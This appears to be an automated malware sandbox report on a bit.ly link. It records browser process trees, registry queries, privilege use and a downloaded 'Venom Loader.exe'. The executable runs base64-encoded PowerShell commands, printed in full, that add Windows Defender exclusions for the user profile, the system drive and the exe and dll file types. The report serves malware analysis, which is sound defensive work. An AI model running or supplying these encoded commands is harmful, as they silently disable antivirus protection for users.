Analysis
-
max time kernel
454s -
max time network
465s -
platform
windows10_x64 -
resource
win10-20220310-en -
submitted
20-03-2022 02:01
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://bit.ly/3rcummH
Resource
win10-20220310-en
windows10_x64
0 signatures
0 seconds
General
-
Target
https://bit.ly/3rcummH
Score
1/10
Malware Config
Signatures
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
firefox.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
chrome.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Modifies registry class 2 IoCs
Processes:
firefox.exechrome.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000_Classes\Local Settings chrome.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exepowershell.exepid process 3796 chrome.exe 3796 chrome.exe 2196 chrome.exe 2196 chrome.exe 2232 chrome.exe 2232 chrome.exe 2232 chrome.exe 2232 chrome.exe 868 chrome.exe 868 chrome.exe 5044 chrome.exe 5044 chrome.exe 4940 chrome.exe 4940 chrome.exe 4896 chrome.exe 4896 chrome.exe 4548 chrome.exe 4548 chrome.exe 904 powershell.exe 904 powershell.exe 904 powershell.exe 904 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
Processes:
chrome.exepid process 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
firefox.exepowershell.exedescription pid process Token: SeDebugPrivilege 1504 firefox.exe Token: SeDebugPrivilege 1504 firefox.exe Token: SeDebugPrivilege 1504 firefox.exe Token: SeDebugPrivilege 904 powershell.exe Token: SeIncreaseQuotaPrivilege 904 powershell.exe Token: SeSecurityPrivilege 904 powershell.exe Token: SeTakeOwnershipPrivilege 904 powershell.exe Token: SeLoadDriverPrivilege 904 powershell.exe Token: SeSystemProfilePrivilege 904 powershell.exe Token: SeSystemtimePrivilege 904 powershell.exe Token: SeProfSingleProcessPrivilege 904 powershell.exe Token: SeIncBasePriorityPrivilege 904 powershell.exe Token: SeCreatePagefilePrivilege 904 powershell.exe Token: SeBackupPrivilege 904 powershell.exe Token: SeRestorePrivilege 904 powershell.exe Token: SeShutdownPrivilege 904 powershell.exe Token: SeDebugPrivilege 904 powershell.exe Token: SeSystemEnvironmentPrivilege 904 powershell.exe Token: SeRemoteShutdownPrivilege 904 powershell.exe Token: SeUndockPrivilege 904 powershell.exe Token: SeManageVolumePrivilege 904 powershell.exe Token: 33 904 powershell.exe Token: 34 904 powershell.exe Token: 35 904 powershell.exe Token: 36 904 powershell.exe -
Suspicious use of FindShellTrayWindow 57 IoCs
Processes:
chrome.exefirefox.exepid process 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 1504 firefox.exe 1504 firefox.exe 1504 firefox.exe 1504 firefox.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe -
Suspicious use of SendNotifyMessage 35 IoCs
Processes:
chrome.exefirefox.exepid process 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 1504 firefox.exe 1504 firefox.exe 1504 firefox.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe 2196 chrome.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
firefox.exepid process 1504 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrome.exedescription pid process target process PID 2196 wrote to memory of 2368 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 2368 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3508 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3796 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 3796 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 1300 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 1300 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 1300 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 1300 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 1300 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 1300 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 1300 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 1300 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 1300 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 1300 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 1300 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 1300 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 1300 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 1300 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 1300 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 1300 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 1300 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 1300 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 1300 2196 chrome.exe chrome.exe PID 2196 wrote to memory of 1300 2196 chrome.exe chrome.exe
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://bit.ly/3rcummH1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffc9d894f50,0x7ffc9d894f60,0x7ffc9d894f702⤵PID:2368
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1516 /prefetch:22⤵PID:3508
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1732 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3796 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2308 /prefetch:82⤵PID:1300
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2968 /prefetch:12⤵PID:2492
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2976 /prefetch:12⤵PID:3352
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4320 /prefetch:82⤵PID:1776
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4600 /prefetch:12⤵PID:3812
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1588 /prefetch:82⤵PID:4356
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:12⤵PID:5064
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1452 /prefetch:12⤵PID:408
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5036 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:2232 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:12⤵PID:2000
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=900 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:868 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:12⤵PID:4836
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6156 /prefetch:12⤵PID:516
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1376 /prefetch:82⤵PID:3432
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4156 /prefetch:82⤵PID:2700
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3180 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5044 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4104 /prefetch:82⤵PID:2212
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6652 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4940 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6660 /prefetch:82⤵PID:812
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5892 /prefetch:82⤵PID:5008
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5824 /prefetch:82⤵PID:4408
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6640 /prefetch:82⤵PID:1776
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5776 /prefetch:82⤵PID:5052
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6576 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4896 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6128 /prefetch:82⤵PID:4856
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6684 /prefetch:82⤵PID:4844
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5604 /prefetch:82⤵PID:2464
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4072 /prefetch:82⤵PID:4220
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6800 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4548 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:12⤵PID:2456
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6964 /prefetch:12⤵PID:4900
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,8184879072501272261,5412338558567451726,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6760 /prefetch:12⤵PID:2232
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:8
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1504 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1504.0.1458041848\2034312922" -parentBuildID 20200403170909 -prefsHandle 1496 -prefMapHandle 1488 -prefsLen 1 -prefMapSize 219609 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1504 "\\.\pipe\gecko-crash-server-pipe.1504" 1608 gpu3⤵PID:944
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1504.3.606809557\934905159" -childID 1 -isForBrowser -prefsHandle 2192 -prefMapHandle 2200 -prefsLen 122 -prefMapSize 219609 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1504 "\\.\pipe\gecko-crash-server-pipe.1504" 2136 tab3⤵PID:4224
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1504.13.2061323196\1115453255" -childID 2 -isForBrowser -prefsHandle 2788 -prefMapHandle 2784 -prefsLen 925 -prefMapSize 219609 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1504 "\\.\pipe\gecko-crash-server-pipe.1504" 2800 tab3⤵PID:4416
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1504.20.463429405\1616194865" -childID 3 -isForBrowser -prefsHandle 2756 -prefMapHandle 3120 -prefsLen 6922 -prefMapSize 219609 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1504 "\\.\pipe\gecko-crash-server-pipe.1504" 1176 tab3⤵PID:4520
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3548
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Venom Loader.zip\Venom Loader.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_Venom Loader.zip\Venom Loader.exe"1⤵PID:4384
-
C:\Windows\system32\cmd.exe"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit2⤵PID:4572
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:904
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
\??\pipe\crashpad_2196_GUFMICMBHTMAXHCRMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/904-132-0x00007FFC99450000-0x00007FFC99E3C000-memory.dmpFilesize
9.9MB
-
memory/904-144-0x0000023878086000-0x0000023878088000-memory.dmpFilesize
8KB
-
memory/904-139-0x0000023878ED0000-0x0000023878F46000-memory.dmpFilesize
472KB
-
memory/904-135-0x0000023877FC0000-0x0000023877FE2000-memory.dmpFilesize
136KB
-
memory/904-134-0x0000023878083000-0x0000023878085000-memory.dmpFilesize
8KB
-
memory/904-133-0x0000023878080000-0x0000023878082000-memory.dmpFilesize
8KB
-
memory/4384-121-0x00007FFC99450000-0x00007FFC99E3C000-memory.dmpFilesize
9.9MB
-
memory/4384-125-0x0000000003BA0000-0x0000000003BB2000-memory.dmpFilesize
72KB
-
memory/4384-124-0x0000000003B70000-0x0000000003B76000-memory.dmpFilesize
24KB
-
memory/4384-123-0x000000001DA20000-0x000000001DE8C000-memory.dmpFilesize
4.4MB
-
memory/4384-122-0x000000001CE00000-0x000000001CE02000-memory.dmpFilesize
